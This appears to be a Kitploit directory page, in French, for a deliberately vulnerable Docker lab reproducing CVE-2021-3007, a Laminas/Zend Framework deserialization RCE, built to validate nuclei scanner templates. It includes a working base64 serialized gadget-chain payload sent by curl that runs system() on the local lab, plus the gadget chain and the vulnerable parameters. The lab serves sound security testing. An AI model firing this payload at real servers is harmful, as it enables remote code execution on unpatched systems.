Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2021-3007-vulnerable — CVE-2021-3007 Environnement de test vulnérable - Désérialisation RCE Laminas/Zend Framework | Kitploit
Outils/GitHubGitHub/kre80r/cve-2021-3007-vulnerable
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubkre80r/cve-2021-3007-vulnerable

cve-2021-3007-vulnerable

CVE-2021-3007 Environnement de test vulnérable - Désérialisation RCE Laminas/Zend Framework

Voir le dépôt
il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Environnement de test vulnérable CVE-2021-3007

Docker CVE CVSS

Environnement de test volontairement vulnérable pour valider la détection de CVE-2021-3007 dans les scanners de sécurité.

Vue d'ensemble de la vulnérabilité

AttributValeur
CVE IDCVE-2021-3007
SévéritéCritique (CVSS 9.8)
TypeDésérialisation non sécurisée → RCE
AffectéLaminas HTTP < 2.14.2, Zend Framework 3.0.0
CWECWE-502 (Désérialisation de données non fiables)

Démarrage rapide

root@kitploit:~
# Clone repository
git clone https://github.com/KrE80r/CVE-2021-3007-vulnerable
cd CVE-2021-3007-vulnerable

# Start vulnerable environment
docker-compose up -d

# Verify it's running
curl http://localhost:8080

# Test with nuclei (optional)
nuclei -t CVE-2021-3007.yaml -u http://localhost:8080

# Cleanup
docker-compose down

Commande en une ligne

root@kitploit:~
docker-compose up -d && sleep 3 && curl -s http://localhost:8080 | head -1

Test d'exploitation manuel

root@kitploit:~
# Send serialized payload triggering RCE
curl -X POST http://localhost:8080/ \
  -d "data=TzoyODoiTGFtaW5hc1xIdHRwXFJlc3BvbnNlXFN0cmVhbSI6Mjp7czoxMDoiACoAY2xlYW51cCI7YjoxO3M6MTM6IgAqAHN0cmVhbU5hbWUiO086Mjg6IkxhbWluYXNcVmlld1xIZWxwZXJcR3JhdmF0YXIiOjI6e3M6NzoiACoAdmlldyI7TzozMzoiTGFtaW5hc1xWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyIjoxOntzOjQ0OiIATGFtaW5hc1xWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyAF9faGVscGVycyI7TzoyMToiTGFtaW5hc1xDb25maWdcQ29uZmlnIjoxOntzOjc6IgAqAGRhdGEiO2E6Mjp7czoxMDoiZXNjYXBlaHRtbCI7czo2OiJzeXN0ZW0iO3M6MTQ6ImVzY2FwZWh0bWxhdHRyIjtzOjE3OiJmaWxlX2dldF9jb250ZW50cyI7fX19czoxMzoiACoAYXR0cmlidXRlcyI7YToxOntzOjIyOiJlY2hvIG51Y2xlaUNWRTIwMjEzMDA3IjtpOjE7fX19"

# Expected: Response contains "nucleiCVE20213007" confirming RCE

Détails techniques

Chaîne de gadgets

root@kitploit:~
Laminas\Http\Response\Stream::__destruct()
  └─► Laminas\View\Helper\Gravatar::__toString()
        └─► Laminas\View\Renderer\PhpRenderer::plugin()
              └─► Laminas\Config\Config::get()
                    └─► system() / file_get_contents()

Composants vulnérables

PaquetVersionRôle
laminas/laminas-http2.14.1Composant HTTP vulnérable
laminas/laminas-view2.12.0Composant de chaîne de gadgets
laminas/laminas-config3.7.0Composant de chaîne de gadgets

Points de terminaison vulnérables

L'application accepte des données sérialisées via POST :

  • Chemin : / ou /index.php
  • Paramètres : data, payload, serialized
  • Encodage : Base64

Détails de l'environnement

ComposantValeur
Image de basephp:8.1-apache
Port8080
Conteneurcve-2021-3007-vulnerable

Fichiers

root@kitploit:~
.
├── Dockerfile          # Container build configuration
├── docker-compose.yml  # Orchestration (one-shot setup)
├── index.php           # Vulnerable PHP application
├── LICENSE             # MIT License
└── README.md           # This file

Avis de sécurité

AVERTISSEMENT : Cet environnement est volontairement vulnérable et est destiné uniquement à des fins de tests de sécurité.

À NE PAS FAIRE :

  • Exposer sur des réseaux publics
  • Déployer dans des environnements de production
  • Laisser tourner sans surveillance
  • Utiliser à des fins malveillantes

À FAIRE :

  • Utiliser dans des environnements de test isolés
  • Arrêter les conteneurs lorsqu'ils ne sont pas utilisés
  • Utiliser uniquement pour une recherche en sécurité légitime

Références

  • NVD - CVE-2021-3007
  • GitHub Advisory - GHSA-xx8f-qf9f-5fgw
  • Version de sécurité Laminas
  • CheckPoint Research - FreakOut
  • Ambionics Research

Licence

Licence MIT - Uniquement à des fins de recherche en sécurité et d'éducation.


Créé pour la validation de modèles nuclei | projectdiscovery/nuclei-templates

Télécharger l’outil